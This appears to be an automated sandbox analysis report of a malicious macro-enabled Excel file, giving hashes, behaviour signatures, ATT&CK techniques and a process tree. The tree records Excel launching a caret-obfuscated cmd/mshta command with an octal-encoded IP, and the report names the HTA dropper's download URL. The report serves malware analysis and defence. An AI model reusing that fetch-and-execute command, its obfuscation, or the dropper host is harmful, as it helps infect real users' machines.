Analysis

  • max time kernel
    102s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    16-04-2022 05:42

General

  • Target

    ?i=1dvifntph.xlsm

  • Size

    110KB

  • MD5

    a3c1eee45b2ee65f5f0fda091c3b9bfe

  • SHA1

    1bd37dfba56924ab73ce9f6da17a946715b6a76a

  • SHA256

    e95a1d9f8651d516e59ddffadc5fd94a499b888077d6cc60ee5cc1b95c1f91e7

  • SHA512

    ec072cf278b55e4b5e283ebb49aacf924cda7e83a2004c84264a4b1d47b3fb280b6313740fd77df2ac59f007a8f4535f5219a010b1d02a7dd1718f39eca3359e

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://46.105.81.76/c.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1dvifntph.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4144
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0056.0151.0121.0114/c.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\system32\mshta.exe
        mshta http://0056.0151.0121.0114/c.html
        3⤵
        • Blocklisted process makes network request
        PID:2488

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1628-137-0x0000000000000000-mapping.dmp
  • memory/2488-138-0x0000000000000000-mapping.dmp
  • memory/4144-136-0x00007FFB31F80000-0x00007FFB31F90000-memory.dmp
    Filesize

    64KB

  • memory/4144-133-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-134-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-135-0x00007FFB31F80000-0x00007FFB31F90000-memory.dmp
    Filesize

    64KB

  • memory/4144-130-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-132-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-131-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-141-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-142-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-143-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB

  • memory/4144-144-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp
    Filesize

    64KB